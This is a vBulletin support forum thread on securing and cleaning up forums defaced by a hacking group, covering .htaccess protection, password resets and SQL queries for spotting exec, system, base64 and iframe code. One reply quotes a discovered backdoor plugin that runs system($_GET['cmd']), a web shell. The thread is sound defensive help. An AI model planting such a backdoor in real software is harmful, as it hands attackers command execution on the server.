Preventative - How to avoid being Hacked by TeamPS i.e. p0wersurge

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • TheLastSuperman
    Senior Member
    • Sep 2008
    • 1799

    [Forum] Preventative - How to avoid being Hacked by TeamPS i.e. p0wersurge

    No doubt some of you have already been defaced at some point in the past, what I aim to do is make a quick post letting you know a few simple tips to avoid or recover from this and also help you re-secure your site if you've recently recovered from such activity.

    Lately what I've noticed is on older versions namely pre 4.1.4 a group of hackers have been exploiting the Admin Username and Password through member groups and the search feature, granting them access to the forum in question to do so as they wish. The main goal of the information outlined below is to help you prevent this from happening by adding in some additional security to your admin and moderator control panels with .htaccess. Initially newer versions were not affected by this however after a recent post on vBulletin.org I'm not sure what other methods they are using - http://www.vbulletin.org/forum/showthread.php?t=275715 so let's go ahead and remedy this shall we?

    ____________________

    If your currently secure:
    1) .htaccess protect your admincp and modcp here are some useful links;
    .htaccess authentication generator:

    .htaccess password generator:


    Now if they are able to somehow obtain your primary admin account username and password they can only do so much damage... why? Well your admin control panel now requires a completely different username and password before you can even login, without server/ftp access they can never bypass this.

    ____________________

    If you've been defaced:
    1) Try restoring to a backup before you were hacked, if not possible recover the best way you can.
    2) Change database passwords *Don't forget to update the config.php files for vBulletin and any other software running on your site.
    3) Change FTP account passwords.
    4) Change admin account passwords.
    5) .htaccess protect your admincp and modcp here are some useful links;
    .htaccess authentication generator:

    .htaccess password generator:

    6) Check to see if they added any admin accounts, on one site they changed the primary admin account name to what they desired and went so far as to re-create the admin accounts w/ the same details but no admin permissions to throw the site owners off for a little bit.

    ___________________

    *Use a entirely different username and complex password when creating the .htaccess and .htpasswd files. Also on that note, be sure the .htpasswd is stored above public_html i.e. in /home/accountnamehere/.htpasswds

    *Also posted on vbulletin.org in article format - http://www.vbulletin.org/forum/showthread.php?t=275719 feel free to comment in either thread or pm me if I do not reply promptly.
    Last edited by TheLastSuperman; Tue 20 Dec '11, 9:42am.


    Former vBulletin Support Staff
    Hacked recently? See my blog post "Recovering a Hacked vBulletin Site".
    Thinking outside the box? Need modification support? Visit www.vBulletin.org and have at it!
  • sivaganesh
    Senior Member
    • Oct 2010
    • 248

    #2
    One doubt: If I have to allow IP in htaccess , is it necessary to be a static IP ?

    My ISP provides dynamic IP - in the range 122.x.x.x, can I make it work ?
    | College student forum | Men beauty and Health Tips | Dress Forum [IPB] |

    [For 6 Months] Unlimited vB Upgrades + $50 AWS CloudFront CDN (billed in my account) + vb.org Mod Installs - PM me. 2 Spots

    Comment

    • TheLastSuperman
      Senior Member
      • Sep 2008
      • 1799

      #3
      If your in a country where your IP changes frequently or by simply unplugging your modem etc I would simply use htaccess w/o it meaning only require a username and password, that should be secure enough even though allowing by IP is more secure your in a situation where you can't do so.

      There might be a way to do so via htaccess however I'm not sure, you will need to look into that further on your own .


      Former vBulletin Support Staff
      Hacked recently? See my blog post "Recovering a Hacked vBulletin Site".
      Thinking outside the box? Need modification support? Visit www.vBulletin.org and have at it!

      Comment

      • Wayne Luke
        vBulletin Technical Support Lead
        • Aug 2000
        • 73981

        #4
        You don't necessarily need to restore a backup to resolve this issue. The most common compromises from this issue are a template replacement issue where one of the common templates has its pre-parsed version replaced. They often also leave a backdoor through a plugin as well. The following steps will allow you to find these problems in the system:

        1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

        2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

        3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type. Even these should be manually reviewed.

        4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

        5) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

        6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

        Query for step 4 and 5 -
        SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

        7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

        It checks the templates for compromising code.

        8) Check .htaccess to make sure there are no redirects there. This isn't a vBulletin issue per se but can cause problems.


        After finding issues and removing them, your software may not be completely operational. There are a couple things you need to do.

        1) Delete any additional administrators you did not authorize. Usergroups -> Usergroup Manager. Look at users listed as Primary and Secondary users in the Administrator group.

        2) You need to rebuild your styles. The easiest way to do this is to run upgrade.php.

        3) Rebuild your plugin Datastore by opening Plugins / Products -> Plugin Manager and saving the display order.

        4) Finally, Upgrade your system to the latest version. If you're exposed to this vulnerability, you are running out of date software. The only way to remain secure is to upgrade to the latest versions.

        5) This is optional but I recommend placing .htaccess password controls on the install, includes, packages and vb directories as well as admincp and modcp.
        Last edited by Wayne Luke; Tue 20 Dec '11, 10:40am.
        Translations provided by Google.

        Wayne Luke
        The Rabid Badger - a vBulletin Cloud demonstration site.
        vBulletin 5 API

        Comment

        • TheLastSuperman
          Senior Member
          • Sep 2008
          • 1799

          #5
          Fantastic post Wayne! Just to note though there's a few members on their team and quite a few on their actual site, each with different talents and skill levels so your encounter with "them" may vary and in-turn that means you may need to try all or only some of the above Wayne listed but best to check everything .
          Last edited by TheLastSuperman; Tue 20 Dec '11, 10:24am.


          Former vBulletin Support Staff
          Hacked recently? See my blog post "Recovering a Hacked vBulletin Site".
          Thinking outside the box? Need modification support? Visit www.vBulletin.org and have at it!

          Comment

          • tChristine
            Senior Member
            • Apr 2010
            • 169

            #6
            Originally posted by TheLastSuperman
            5) .htaccess protect your admincp and modcp here are some useful links;
            .htaccess authentication generator:
            Hi TLS,

            Could you please post a specific example for admincp?

            If the output is this:

            AuthType Basic <--leave as is? - Required?
            AuthName "My Protected Area" <-- what path/syntax do you use here for admincp?
            AuthUserFile /path/to/.htpasswd <-- so it's domain.com(or php?)/public_html/.htpasswd ?
            Require valid-user <--leave as is? - Required?

            Thank you.
            FF w/ Web Dev / Firebug / DW

            Comment

            • Ace
              Senior Member
              • Apr 2004
              • 4051
              • 4.2.X

              #7
              Originally posted by tChristine
              Hi TLS,

              Could you please post a specific example for admincp?

              If the output is this:

              AuthType Basic <--leave as is? - Required? Yes.
              AuthName "My Protected Area" <-- what path/syntax do you use here for admincp? Whatever you like. "Sausages".
              AuthUserFile /path/to/.htpasswd <-- so it's domain.com(or php?)/public_html/.htpasswd ? Noooo! Not under public_html, above it.
              Require valid-user <--leave as is? - Required? Yes,

              Thank you.
              My answers in red above.
              My Live vB5 Site - NZEating.com
              vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

              Comment

              • SVTOA
                Member
                • Oct 2002
                • 47

                #8
                I ran one of the queries suggested above and found this:

                PHP Code:
                DF
                     ob_start
                (); system($_GET['cmd']); $execcode ob_get_contents(); ob_end_clean();
                     
                global_start     vbulletin 
                I can't figure out where this code has been placed. Can anyone help please?

                - - - Updated - - -

                Followup- Found a plugin "DF" and it contains this code.

                Comment

                • Black Snow
                  New Member
                  • Jul 2012
                  • 13
                  • 4.2.X

                  #9
                  I ran the .htpasswrd tool from the link in the first post and created a .htaccess file. Can I place the .htaccess file in every directory in my site?

                  The questions I am facing now are, if I place it in every directory:

                  • Will my forum still be able to run properly?
                  • Will attachments still be able to be downloaded?
                  • Will avatars, images etc still be able to be uploaded?
                  • Will this restrict me from doing anything?


                  If the answer to the above questions is no, the forum won't run properly, where is the most important place to put the .htaccess file to prevent my forum being hacked?

                  Comment

                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 73981

                    #10
                    You should only place the .htaccess file in the admincp, modcp, install, includes, packages and vb directories.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API

                    Comment

                    • Black Snow
                      New Member
                      • Jul 2012
                      • 13
                      • 4.2.X

                      #11
                      What do you mean by vb directories?

                      Comment

                      • Wayne Luke
                        vBulletin Technical Support Lead
                        • Aug 2000
                        • 73981

                        #12
                        There is a directory named vb... It is the last in a list of directories provided in my post above (admincp, modcp, install, include, packages, vb).
                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API

                        Comment

                        • zapiy
                          Member
                          • Mar 2008
                          • 58

                          #13
                          This has happened on a site i am trying to help out on.. The server side has been completely replaced with new code and the VB software upgraded.. The exploit it only not active when the hooks are disabled but no mods are currently installed?

                          Could someone please help us out?

                          Cheers

                          Comment

                          • The_Rascal
                            New Member
                            • Aug 2008
                            • 13

                            #14
                            Originally posted by zapiy
                            This has happened on a site i am trying to help out on.. The server side has been completely replaced with new code and the VB software upgraded.. The exploit it only not active when the hooks are disabled but no mods are currently installed?

                            Could someone please help us out?

                            Cheers
                            Thanks Zapiy.
                            It is my forum that has the issues. I have attached screen dumps of the tools installed.
                            Anyone know how to remove them?
                            Our hosts are saying that they are not installed server side, I have downloaded and run an antivirus scan on all the ftp files (fresh, clean upload of vb 4.20) and of course that came up clean.

                            Any help or assistance will be very much appreciated

                            Thanks

                            Rascal
                            Attached Files

                            Comment

                            • snakes1100
                              Senior Member
                              • Aug 2001
                              • 1249

                              #15
                              Originally posted by The_Rascal
                              Thanks Zapiy.
                              It is my forum that has the issues. I have attached screen dumps of the tools installed.
                              Anyone know how to remove them?
                              Our hosts are saying that they are not installed server side, I have downloaded and run an antivirus scan on all the ftp files (fresh, clean upload of vb 4.20) and of course that came up clean.

                              Any help or assistance will be very much appreciated

                              Thanks

                              Rascal
                              You should start your own thread.

                              Its not going to be as easy, its not just something we can say point blank, its here or there.

                              If the files are scanned & verified as clean, w/ either a tool or because you have deleted all files & replaced them, including htaccess files, then you will need to scan the DB & verify its clean as well, id start by scanning the db for ifram, exec code in your template & plugin tables.
                              Gentoo Geek

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...